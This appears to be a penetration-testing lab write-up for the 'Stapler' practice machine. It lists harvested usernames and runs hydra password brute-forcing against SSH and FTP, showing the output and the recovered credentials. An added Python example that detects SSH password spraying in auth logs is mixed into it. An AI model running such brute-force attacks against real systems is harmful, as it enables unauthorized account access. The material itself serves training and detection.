Brute-Force Attack


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt              
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
john
harry
kathy
fred
Zoe
Tim
Barry
dave
Abby
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt | wc -l

A total of 39 usernames have been collected from various sources, including FTP, Samba, web servers and a ZIP archive.

While no password is known at this time, I will attempt a brute-force attack with hydra, using the -e nsr flag to check for a null password, the username as the password, and the reversed username as the password.

SSH


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ssh://$IP -t 64      
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 22:17:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ssh://192.168.239.148:22/
[22][ssh] host: 192.168.239.148   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 22:18:24

Found a valid SSH credential for the SHayslett user: SHayslett
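From the defender's side, a run like the one above shows up in the SSH server's auth log as one source failing against many different accounts within seconds, followed by an accepted login. The detector below is an added example, not part of the original write-up or of hydra. It assumes OpenSSH's syslog-style password messages; the function name, thresholds, hostname, addresses and log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH password-auth log lines (syslog timestamp carries no year).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_spray(lines, min_users=5, window=timedelta(seconds=60), year=2025):
    """Flag sources failing against >= min_users distinct accounts in one window."""
    failed, accepted = defaultdict(list), defaultdict(list)  # ip -> [(time, user)]
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        bucket = failed if m["result"] == "Failed" else accepted
        bucket[m["ip"]].append((ts, m["user"]))
    alerts = {}
    for ip, events in failed.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide window forward
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:
                first = events[start][0]
                # Accepted logins from this source after the burst began: guessed accounts.
                hits = [u for t, u in accepted[ip] if t >= first]
                alerts[ip] = {"users": users, "accepted": hits}
                break
    return alerts

# Constructed sample log: documentation-range addresses, made-up hostname and PIDs.
SAMPLE = """\
Apr 28 22:10:02 target sshd[1990]: Failed password for JKanode from 198.51.100.7 port 51000 ssh2
Apr 28 22:10:09 target sshd[1990]: Accepted password for JKanode from 198.51.100.7 port 51000 ssh2
Apr 28 22:17:41 target sshd[2101]: Failed password for invalid user peter from 203.0.113.5 port 40101 ssh2
Apr 28 22:17:42 target sshd[2102]: Failed password for RNunemaker from 203.0.113.5 port 40102 ssh2
Apr 28 22:17:43 target sshd[2103]: Failed password for ETollefson from 203.0.113.5 port 40103 ssh2
Apr 28 22:17:44 target sshd[2104]: Failed password for DSwanger from 203.0.113.5 port 40104 ssh2
Apr 28 22:17:45 target sshd[2105]: Failed password for AParnell from 203.0.113.5 port 40105 ssh2
Apr 28 22:17:46 target sshd[2106]: Accepted password for SHayslett from 203.0.113.5 port 40106 ssh2
""".splitlines()
if __name__ == "__main__":
    print(detect_spray(SAMPLE))
```

The single mistyped password from 198.51.100.7 stays below the distinct-user threshold, so only the spraying source is reported, together with the account it logged in as.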

FTP


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ftp://$IP -t 64 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 23:36:25
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ftp://192.168.239.148:21/
[21][ftp] host: 192.168.239.148   login: SHayslett   password: SHayslett
[21][ftp] host: 192.168.239.148   login: elly   password: ylle
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 23:36:37

Found 2 valid FTP credentials:

  • SHayslett:SHayslett
  • elly:ylle